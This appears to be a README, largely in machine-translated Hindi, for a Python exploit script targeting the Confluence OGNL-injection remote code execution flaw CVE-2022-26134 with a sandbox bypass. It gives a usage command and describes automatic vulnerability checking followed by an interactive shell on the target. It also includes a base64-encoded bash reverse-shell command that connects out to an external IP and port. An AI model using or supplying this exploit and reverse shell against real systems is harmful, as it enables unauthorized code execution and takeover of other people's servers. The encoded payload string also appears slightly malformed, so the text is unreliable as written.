
[CVE-2022-26134] Confluence OGNL एक्सप्रेशन इंजेक्शन RCE सैंडबॉक्स बाईपास के साथ।
कोन्फ्लुएंस OGNL अभिव्यक्ति इंजेक्टेड RCE(CVE-2022-26134) poc and exp
सैंडबॉक्स बायपास जोड़ें, उच्च संस्करण समर्थित।
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
स्क्रिप्ट स्वचालित रूप से जांच करेगी कि लक्ष्य कमजोर है या नहीं, और यदि यह कमजोर है तो एक छद्म-इंटरैक्टिव शेल में प्रवेश करेगी।
लिनक्स पर परीक्षण:

विंडोज पर परीक्षण:

जब आप छोड़ना चाहें तो बस 'q' दर्ज करें।
कमांड पैरामीटर सीधे runtime.exec विधि में पास किए जाते हैं, जिसमें शेल का संदर्भ नहीं होता।
इसलिए।
विंडोज में, dir जैसे कुछ कमांड सीधे निष्पादित नहीं किए जा सकते, आप cmd.exe /c dir का उपयोग कर सकते हैं।
लिनक्स में, कुछ विशेष प्रतीक प्रभावी नहीं हो सकते, यदि आपको रिवर्स शेल जैसे विशेष प्रतीकों के साथ कोई कमांड निष्पादित करने की आवश्यकता है, तो आप इसे base64 एन्कोड कर सकते हैं और फिर bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i} का उपयोग कर सकते हैं।